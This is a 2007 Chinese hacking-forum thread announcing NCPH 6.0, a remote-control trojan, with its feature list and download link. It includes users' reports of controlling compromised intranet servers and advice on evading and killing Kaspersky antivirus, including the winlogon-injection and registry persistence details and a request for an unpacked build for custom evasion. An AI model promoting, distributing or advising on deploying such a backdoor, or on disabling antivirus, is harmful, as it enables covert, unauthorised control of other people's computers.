软件作者：凋凌玫瑰[N.C.P.H]
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

ncph6.0功能简介

1)磁盘管理，上传下载，运程执行，支持断点续传，支持多语言查看和使用。
2)进程管理，查看进程，终此进程
3)服务管理，查看服务，启动服务，停止服务
4)远程控制，查看屏幕，控制屏幕
5)cmdshell,命令执行，仿windows cmdshell
5)系统命令，发消息，关机重启，卸载。

软件稳定性很强，注入winlogon，双进程守护，去掉了不必要的hook隐藏。
本软件适合做渗透使用，请勿用于挂马，鉴于防止使用于挂马，做了一些功能上的限制。

ncph将推出下一个高隐藏与稳定性的版本，敬请关注。

本软件由“无花果”与“凋凌玫瑰”共同开发，请勿用于非法，软件由远程管理的观点出法，一切与软所引起的事故与作者无关。

注：由于使用了Themida加壳，有时候需要重启机器才可以使用。

http://www.cnasm.com 编程驿站
http://www.ncph.net ncph工作室

呵呵，刚好需要一个远程控制木马
测试成功上线……
目标机是内网的
显示的居然就是内网IP……

效果非常不错，呵呵
正好有两个不适于正向连接的服务器
用NCPH6.0搞定了……呵呵

test.JPG (77 KB)

2007-3-8 23:36

I will go to down..

这个我还没用过 远程我就用过鸽子 黑洞..换汤不换药了

特点呢..!

主动连接就喜欢 radmin 呵呵。
  自动连接以前一直用鸽子。

发现远程控制功能根本用不了……

别加Themida了，使用过5.0限制版的朋友使用这个版本有可能会出现错误提示，无法使用。
楼上滴，你看看大小，再想想Themida的高加密性，就能知道功能多少喽。这是个DEMO版貌似。演示而已。

个人感觉黑洞比较好一点，黑洞的屏幕很流畅，可以和radmin媲美

已检测到: 恶意程序 HackTool.Win32.VB.df  URL: http://forum.eviloctal.com/job-h ... -4086.html/NBSI.exe
KAV提示~~
很实用~~ 关注稳定版~~

黑洞和鸽子都是以服务启动的,其隐蔽性很一般,所以说鸽子和黑洞适合挂马,楼上说的kv被杀应该是发错了东西吧,测试时卡巴都不杀的;对于功能限制方面就是没有做到灰鸽子那些很多无聊的功能,不希望这个版本被别人拿去挂马,那样大材小用了,这个马的价值只有做渗透的人才能体会,马的作用也只有会用它的人才能感觉,更多的评论自己去体会吧.

测试了一下，暂时还真没发现启动方法，不过楼主说是注入winlogon，俺这怎么是IE呢？

呵呵```
一直很喜欢玫瑰大哥的作品.
5.0以前用效果还是不错的.

关注……

为什么不能在卡巴下启动客户端？

卡巴主动防御在服务端安装时的检测结果：
进程 C:\WINDOWS\system32\csjdll.exe (PID: 3340) 试图注入到进程 \\?\C:\WINDOWS\system32\winlogon.exe (PID: 464).


进程试图更改 创建 这个在注册表中属于组 System Startup.这些键值是用来管理系统启动时执行哪些程序的。

建议您仔细确认这些键值，确保只有经过您允许的程序才能在系统启动时被执行，而其它程序不能在系统启动时被执行。

键值: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\CSJDLL

值: DllName

新数据(unicode空结束字符):
C:\WINDOWS\system32\csjdll.dll


进程 C:\WINDOWS\system32\winlogon.exe (PID: 464) 试图注入到进程 C:\Program Files\Internet Explorer\iexplore.exe (PID: 3408).
看来ＮＣＰＨ　６．０在过主动防御方面还有待改进哦
对渗透来说，装了卡巴的，且所有主动防御都开的最好别装了。

引用:

引用第15楼taiwansee于2007-03-09 19:20发表的 :
看来ＮＣＰＨ　６．０在过主动防御方面还有待改进哦
对渗透来说，装了卡巴的，且所有主动防御都开的最好别装了

只要写得比卡巴更底层就OK了

引用:

引用第14楼taiwansee于2007-03-09 19:07发表的 :
为什么不能在卡巴下启动客户端？

我反问你一个问题,能否在卡吧下启动木马?

NCPH在过墙上有待提高，个人认为类似于“双进程守护”没有太大必要，因为后门一旦都暴露了，再守护也无济于事了，不过NCPH的稳定性确实不错

我比较幸运第一次测试ncph6.0 就遇上一台支持DEP数据执行保护的机器,被控端运行后,控制端没反应,害我纳闷很久.最后才查明是DEP闹鬼.

速度ok.而且用icesworld表面查不出进程异样.看了asm在红狼写的对5.0服务端的分析,学习ing

回16、17楼的asm大哥：
小弟很菜，正在成长，我觉得kaspsersky已经够底层的了，应该是ring 0级别的东东，
两个avp进程相当的BT，偶到现在还不知道有什么办法能K掉它们。
它的服务连stop都不可以，只能改成手动启动或者禁用，但是那要重启才生效。
我运行客户端的时候，把卡巴的各种监控都关闭了，可是还是启动不了客户端，我感觉应该是
NCPH的客户端有排斥kaspersky的代码，我猜想可能是检查是否有卡巴的驱动，如果有就退出了。

刚刚测试出的结果：

卡巴的两个avp进程，先用冰刃K掉以system身份运行的avp.exe然后再k 掉以系统用户身份运行的avp.exe，就可以把它们干掉了。

但是在入侵中我们没装后门前一般没办法图形界面下操作啊。

本机测试无法上线，是XPSP2的。
不知道是不是防止用来挂马做的限制~~~~~
在一台2003有服务器上却可以

  感觉还是不如新版的守望者啊

守望的启动也很隐蔽的说  新版据说过卡巴主动防御

目前虽然我所学习的语言喝你们的不一样,但是远程软件我到是一直喜欢黑洞.但觉得黑洞还是有很多不必要的功能.

因为加了themida的壳,部分xp用户不能使用,还有ip显示内网ip已修正,请下载新的版本
http://www.ncph.net/soft/ncph6.0.rar

晕忽忽,,加themida ...还搞驱动壳....建议你搞个.WinLicense 算了..
什么时候搞个无壳版出来...好做个人版免杀.